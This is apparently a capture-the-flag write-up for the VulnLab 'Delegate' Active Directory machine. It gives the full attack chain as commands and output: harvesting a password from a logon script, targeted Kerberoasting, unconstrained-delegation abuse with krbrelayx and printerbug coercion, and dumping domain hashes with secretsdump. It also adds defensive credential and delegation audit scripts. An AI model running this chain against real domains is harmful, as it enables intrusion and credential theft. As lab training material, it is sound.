VulnLab Delegate

Recon

└─$ rustscan -g -a 10.10.79.151 -r 1-65535
10.10.79.151 -> [53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389]
└─$ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389 10.10.79.151                          
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 19:24 +05
Nmap scan report for 10.10.79.151
Host is up (0.51s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-24 14:23:13Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC1.delegate.vl
| Not valid before: 2024-12-23T14:19:13
|_Not valid after:  2025-06-24T14:19:13
| rdp-ntlm-info: 
|   Target_Name: DELEGATE
|   NetBIOS_Domain_Name: DELEGATE
|   NetBIOS_Computer_Name: DC1
|   DNS_Domain_Name: delegate.vl
|   DNS_Computer_Name: DC1.delegate.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-12-24T14:23:18+00:00
|_ssl-date: 2024-12-24T14:23:58+00:00; -1m19s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-12-24T14:23:19
|_  start_date: N/A
|_clock-skew: mean: -1m19s, deviation: 0s, median: -1m19s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.02 seconds

User

Anonymous authentication on SMB shows nothing interesting. Let's run the spider_plus module:

└─$ nxc smb 10.10.79.151  -u guest -p '' -M spider_plus
SMB         10.10.79.151    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.79.151    445    DC1              [+] delegate.vl\guest: 
SPIDER_PLUS 10.10.79.151    445    DC1              [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.79.151    445    DC1              [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.79.151    445    DC1              [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.79.151    445    DC1              [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.79.151    445    DC1              [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.79.151    445    DC1              [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.79.151    445    DC1              [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.79.151    445    DC1              [*] Enumerated shares
SMB         10.10.79.151    445    DC1              Share           Permissions     Remark
SMB         10.10.79.151    445    DC1              -----           -----------     ------
SMB         10.10.79.151    445    DC1              ADMIN$                          Remote Admin
SMB         10.10.79.151    445    DC1              C$                              Default share
SMB         10.10.79.151    445    DC1              IPC$            READ            Remote IPC
SMB         10.10.79.151    445    DC1              NETLOGON        READ            Logon server share 
SMB         10.10.79.151    445    DC1              SYSVOL          READ            Logon server share 
SPIDER_PLUS 10.10.79.151    445    DC1              [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.79.151.json".
SPIDER_PLUS 10.10.79.151    445    DC1              [*] SMB Shares:           5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.79.151    445    DC1              [*] SMB Readable Shares:  3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.79.151    445    DC1              [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.79.151    445    DC1              [*] Total folders found:  19
SPIDER_PLUS 10.10.79.151    445    DC1              [*] Total files found:    7
SPIDER_PLUS 10.10.79.151    445    DC1              [*] File size average:    1.15 KB
SPIDER_PLUS 10.10.79.151    445    DC1              [*] File size min:        22 B
SPIDER_PLUS 10.10.79.151    445    DC1              [*] File size max:        3.86 KB

There is a users.bat script:

{
    "NETLOGON": {
        "users.bat": {
            "atime_epoch": "2023-08-26 18:54:29",
            "ctime_epoch": "2023-08-26 18:45:24",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "159 B"
        }
    },
    "SYSVOL": {
        "delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
            "atime_epoch": "2023-09-09 20:10:32",
            "ctime_epoch": "2023-08-26 15:39:30",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "22 B"
        },
        "delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2023-08-26 17:24:26",
            "ctime_epoch": "2023-08-26 15:39:30",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "1.07 KB"
        },
        "delegate.vl/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
            "atime_epoch": "2023-08-26 16:01:56",
            "ctime_epoch": "2023-08-26 16:01:56",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "2.73 KB"
        },
        "delegate.vl/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
            "atime_epoch": "2023-09-09 20:10:32",
            "ctime_epoch": "2023-08-26 15:39:30",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "22 B"
        },
        "delegate.vl/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
            "atime_epoch": "2023-09-09 17:17:20",
            "ctime_epoch": "2023-08-26 15:39:30",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "3.86 KB"
        },
        "delegate.vl/scripts/users.bat": {
            "atime_epoch": "2023-08-26 18:54:29",
            "ctime_epoch": "2023-08-26 18:45:24",
            "mtime_epoch": "2023-10-01 15:08:32",
            "size": "159 B"
        }
    }
}

Let's check its content:

└─$ nxc smb 10.10.79.151  -u guest -p '' --share SYSVOL --get-file delegate.vl\\scripts\\users.bat users.bat
SMB         10.10.79.151    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.79.151    445    DC1              [+] delegate.vl\guest: 
SMB         10.10.79.151    445    DC1              [*] Copying "delegate.vl\scripts\users.bat" to "users.bat"
SMB         10.10.79.151    445    DC1              [+] File "delegate.vl\scripts\users.bat" was downloaded to "users.bat"  
└─$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator <REDACTED>
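
A logon script in NETLOGON that maps a share with a literal password is exactly what a SYSVOL audit should catch. The following is an added example (not code from the original post): a small scanner for the `net use ... /user:<name> <password>` pattern, run over a constructed copy of users.bat whose password token is a placeholder.

```python
import re

# Constructed sample shaped like the users.bat found in NETLOGON; the password
# token is a placeholder, not a value from the lab.
SAMPLE_SCRIPT = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P@ssw0rd-PLACEHOLDER
"""

# 'net use <drive> <unc> /user:<name> <password>' with the password on the line.
# An interactive prompt ('*') in the password position is not a finding.
NET_USE_CRED = re.compile(
    r"net\s+use\s+\S+\s+(?P<share>\\\\\S+)\s+/user:(?P<user>\S+)\s+(?P<secret>\S+)",
    re.IGNORECASE,
)


def find_embedded_credentials(script_text: str) -> list[dict]:
    """Return one finding per line that maps a share with a hard-coded password.

    Commented-out (rem) lines are scanned too: a secret in a comment still leaks
    to every principal that can read NETLOGON/SYSVOL.
    """
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        m = NET_USE_CRED.search(line)
        if not m or m.group("secret") == "*":
            continue
        findings.append({
            "line": lineno,
            "share": m.group("share"),
            "user": m.group("user"),
            # never copy the secret itself into a report; record its length only
            "secret_len": len(m.group("secret")),
        })
    return findings


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_SCRIPT):
        print(f"line {f['line']}: {f['share']} mapped as {f['user']} "
              f"with a {f['secret_len']}-char literal password")
```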

The credentials are valid:

└─$ nxc smb 10.10.79.151  -u A.Briggs -p '<REDACTED>' --shares                                      
SMB         10.10.79.151    445    DC1              [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False)
SMB         10.10.79.151    445    DC1              [+] delegate.vl\A.Briggs:<REDACTED> 
SMB         10.10.79.151    445    DC1              [*] Enumerated shares
SMB         10.10.79.151    445    DC1              Share           Permissions     Remark
SMB         10.10.79.151    445    DC1              -----           -----------     ------
SMB         10.10.79.151    445    DC1              ADMIN$                          Remote Admin
SMB         10.10.79.151    445    DC1              C$                              Default share
SMB         10.10.79.151    445    DC1              IPC$            READ            Remote IPC
SMB         10.10.79.151    445    DC1              NETLOGON        READ            Logon server share 
SMB         10.10.79.151    445    DC1              SYSVOL          READ            Logon server share 

Let's enumerate the domain. We see that A.Briggs has GenericWrite over N.Thompson, who is a member of the Remote Management group.

We can perform targeted Kerberoasting with targetedKerberoast.py and crack the resulting hash:

└─$ python3 ~/tools/red-team/targetedKerberoast/targetedKerberoast.py -d 'delegate.vl' -u 'A.Briggs' -p '<REDACTED>' --request-user "N.Thompson" --dc-ip 10.10.79.151
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$664fa24f1ada593976ff6183143991bf$136e3eb290886345007d21b20a1ae115d36a7da19e23c486d617ddd2451363e42549f0acad0fcd98c74cc757ba1cb6901da828c58ee2c2a6cf3d8e638e1becb20b42f7109824e1ef60a976e7d4744d178af69cccbba01863d81fe3e1b3509393df47dd9e824d1956980ad1318308f76921e9f5074741d2f063d98b69beea57ab6d176a9d6004aa48dd95b5fbf13e15638b0803b9c4be9795fc0c5dd110c733bc977f2839ff0df5277e3ccf72b7e20f0de6894c6dfb807df2eb0f98b22b10c7d5edee5db2d7581af160ee865b35b68bc7b1bcbfe75119bd2ac8ac95d2a8aae9254ac384bc9e70a3ceaaa3132b65d32d0be1a4bc8ed47ccbdda136d93ce4f2b0191204751ce2dfd0ac7016ae0e438af116bbe967d19212ecda73d383934c188659f3ceefd4d535376f8d4ca1cc57a767d2f4f527ac3c15b8c771bacae5e78a23de870d55527db334744273912c98d7d064e2ac882cbff318ba99130616691af53d76ff3f05499219a79bb87267b1365a489b5978555f24e7e40b77258fcaa8a509e9d5691714d024203cc3456d8940d0d3a4cf220823e91354f7e4874f8499a3ea1acdd0310f02132b0205c70127e281d3b4238da2916f069b52adf2cb483263f6b3e039f2ca367a5002d1d920a38247a5daae4db14ef2903529ecaf81c93017e76c35b288fdd75678f203d6256d606e226925a6e4c12c79ae86851e73956b373cdec7de9a90cd4d1f1f107de5e4e2b48e264fca7ef0c2652f392b3712efc8518ea979bfb20c3fc4d9e9e8fe2293f57c2d80caae9a63bcb93dc4b142a610859eb4d7b3e3d1fa5dcf383fba023386b539acb346f9247265cdc36975a01b69c14b641dc8cd617b592ae6b2e4efb7fdb2977a14521c0ec6072ca67b5c5f910054f10f798e9a19f07464a6246454eb20b0a1c82ebfcd5c42cd68e9e335f11c2bdd23d5748e32c9113d8203f5e4deeaa973bbc65c7a3b2a8e8b5315d205ff1ab269ad34c26eec691dcfe1989a6e62f28b12ba96ae93a0f8d2ceb9f63d151269ff0017b7553464c749e08729016dd0c1dc68b686117438ac65b203468589e652b17f37fcd67b35e6bdc71f8813cdca7d59c38191f04c263c0550b5a2ceabb453f72beb8c0253b9b2ecd86763ff505ca1bb8c3da5609d843aacc80679d7357961107f0f6136f1c9ec2c994eaf2c488d93a805a8653f2df641acdbda5835b56987516c7f7f01f73b80182a5d93821b70dc7e21638a3f286bb346054e5dc642a99f1ff356b91d860f7bb9b1e8fa7f37c98b29ddf2501384dbacaff12088a6dd8125dda7caee3416d7eac5a267ee765f3074cb87de3cedcb9618e8d3c2baca3
92b6d2aada436c1a5b6974110ec88f816a779f7c493340d64c4066013478681cd5f74f9b273cd80df8e0d8b235517dd0b16cc802f534e5e1bd6c84159ade0f3b12ca381d080fc12189cac
└─$ hashcat -m 13100 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$664fa24f1ada593976ff6183143991bf$<SNIP>:<REDACTED>
<SNIP>

Now we can connect via WinRM:

└─$ evil-winrm -u 'N.Thompson' -p '<REDACTED>' -i 10.10.79.151                     
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\N.Thompson\Documents>

Root

We can see that N.Thompson is a member of the Delegation Admins group.

The privileges also show this:

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                                                    State
============================= ============================================================== =======
SeMachineAccountPrivilege     Add workstations to domain                                     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                                       Enabled
SeEnableDelegationPrivilege   Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                                 Enabled

This means we can enable unconstrained or constrained delegation on a computer account. To abuse this privilege we need a computer account we control, and we can create one because the Machine Account Quota allows it:

└─$ nxc ldap 10.10.79.151 -u 'N.Thompson' -p '<REDACTED>' -M maq
LDAP        10.10.79.151    389    DC1              [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl)
LDAP        10.10.79.151    389    DC1              [+] delegate.vl\N.Thompson:<REDACTED> 
MAQ         10.10.79.151    389    DC1              [*] Getting the MachineAccountQuota
MAQ         10.10.79.151    389    DC1              MachineAccountQuota: 10

Let's create the computer account first:

└─$ addcomputer.py -computer-name 'PWN' -computer-pass 'ComputerPass123' -dc-ip 10.10.79.151 'delegate.vl/N.Thompson':'<REDACTED>'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account PWN$ with password ComputerPass123.

Now we add a DNS record for the machine we created, using dnstool.py from the krbrelayx toolkit:

└─$ python3 ~/tools/red-team/krbrelayx/dnstool.py -u 'delegate.vl\PWN$' -p 'ComputerPass123' -r 'PWN.delegate.vl' -d 10.8.4.147 --action add 10.10.79.151
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
└─$ nslookup PWN.delegate.vl dc1.delegate.vl
Server:         dc1.delegate.vl
Address:        10.10.79.151#53

Name:   PWN.delegate.vl
Address: 10.8.4.147

Then we set TRUSTED_FOR_DELEGATION on the machine account we created, which can be done with bloodyAD or Powerview (Set-MachineAccountAttribute -MachineAccount pwned -Attribute useraccountcontrol -Value 528384):

└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p '<REDACTED>' --host 'DC1.delegate.vl' add uac 'PWN$' -f TRUSTED_FOR_DELEGATION 
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to PWN$'s userAccountControl
└─$ python3 ~/tools/red-team/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p '<REDACTED>' --host 'DC1.delegate.vl' get object 'PWN$' --attr userAccountControl

distinguishedName: CN=PWN,CN=Computers,DC=delegate,DC=vl
userAccountControl: WORKSTATION_TRUST_ACCOUNT; TRUSTED_FOR_DELEGATION
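
The value 528384 used with Powerview above is simply WORKSTATION_TRUST_ACCOUNT (0x1000) plus TRUSTED_FOR_DELEGATION (0x80000), which is what bloodyAD prints back. To put that in a defender's terms, here is an added audit helper (my example, not code from the original writeup or from bloodyAD) that decodes a userAccountControl bitmask, builds the server-side LDAP filter for the same check, and flags non-DC accounts that are trusted for unconstrained delegation; the sample entries are constructed, not exported from the lab domain.

```python
# userAccountControl bit values documented by Microsoft (subset relevant to delegation review).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",          # domain controllers
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",       # unconstrained delegation
    0x100000: "NOT_DELEGATED",
    0x400000: "DONT_REQ_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained w/ protocol transition
}

# LDAP_MATCHING_RULE_BIT_AND: lets an LDAP filter test individual UAC bits server-side.
BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value: int) -> list[str]:
    """Expand a userAccountControl integer into its set flag names, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def unconstrained_non_dc_filter() -> str:
    """LDAP filter for accounts trusted for unconstrained delegation that are not DCs."""
    return (f"(&(userAccountControl:{BIT_AND}:={0x80000})"
            f"(!(userAccountControl:{BIT_AND}:={0x2000})))")


def review_delegation(entries) -> dict[str, str]:
    """entries: iterable of (sAMAccountName, userAccountControl) pairs.
    Returns {name: reason} for accounts a defender should review."""
    findings = {}
    for name, uac in entries:
        flags = decode_uac(uac)
        if "TRUSTED_FOR_DELEGATION" in flags and "SERVER_TRUST_ACCOUNT" not in flags:
            findings[name] = "unconstrained delegation on a non-DC account"
        elif "TRUSTED_TO_AUTH_FOR_DELEGATION" in flags:
            findings[name] = "constrained delegation with protocol transition"
    return findings


# Constructed sample; DC1$ is expected to carry the flag, PWN$ is the value set on the page.
SAMPLE = [
    ("DC1$", 0x2000 | 0x80000),
    ("PWN$", 528384),                  # 0x1000 | 0x80000
    ("WS01$", 0x1000),                 # plain workstation account
    ("svc_web", 0x200 | 0x10000 | 0x1000000),
]

if __name__ == "__main__":
    print(decode_uac(528384))
    print(unconstrained_non_dc_filter())
    for name, reason in review_delegation(SAMPLE).items():
        print(f"{name}: {reason}")
```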

Then we add the SPN. If you encounter the error "To add any SPN in the current domain, use --additional to add the SPN via the msDS-AdditionalDnsHostName attribute", run the tool first with the --additional flag and then again without it (this usually happens when adding the SPN as another user):

└─$ python3 ~/tools/red-team/krbrelayx/addspn.py  -u 'delegate.vl\PWN$' -p 'ComputerPass123' -s 'CIFS/PWN.delegate.vl' dc1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
└─$ python3 ~/tools/red-team/krbrelayx/addspn.py  -u 'delegate.vl\PWN$' -p 'ComputerPass123' -s 'HOST/PWN.delegate.vl' dc1.delegate.vl -q
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
DN: CN=PWN,CN=Computers,DC=delegate,DC=vl - STATUS: Read - READ TIME: 2024-12-24T21:40:21.224333
    msDS-AdditionalDnsHostName: PWN.delegate.vl
    sAMAccountName: PWN$
    servicePrincipalName: CIFS/PWN.delegate.vl

With the preparation done, we can start the attack. First convert the machine account's password to its NT (NTLM) hash:

└─$ pypykatz crypto nt 'ComputerPass123'                           
fa0c39088858443e31cf449a9da745ba

Or:

└─$ iconv -f ASCII -t UTF-16LE <(printf "ComputerPass123") | openssl dgst -md4
MD4(stdin)= fa0c39088858443e31cf449a9da745ba

Start krbrelayx.py (I had to specify the target or it didn't work):

└─$ sudo python3 krbrelayx.py -hashes :fa0c39088858443e31cf449a9da745ba --target dc1.delegate.vl
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in attack mode to single host
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections

And use printerbug.py to coerce the DC's authentication:

└─$ python3 printerbug.py delegate.vl/'PWN$':'ComputerPass123'@dc1.delegate.vl PWN.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at dc1.delegate.vl
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

We see the connection, and the ticket is saved.

Now we can dump the hashes:

└─$ KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache secretsdump.py -k -no-pass dc1.delegate.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
<SNIP>

https://api.vulnlab.com/api/v1/share?id=5727db2c-27ce-40a1-9fa1-abd3445f89de

This post is licensed under CC BY 4.0 by the author.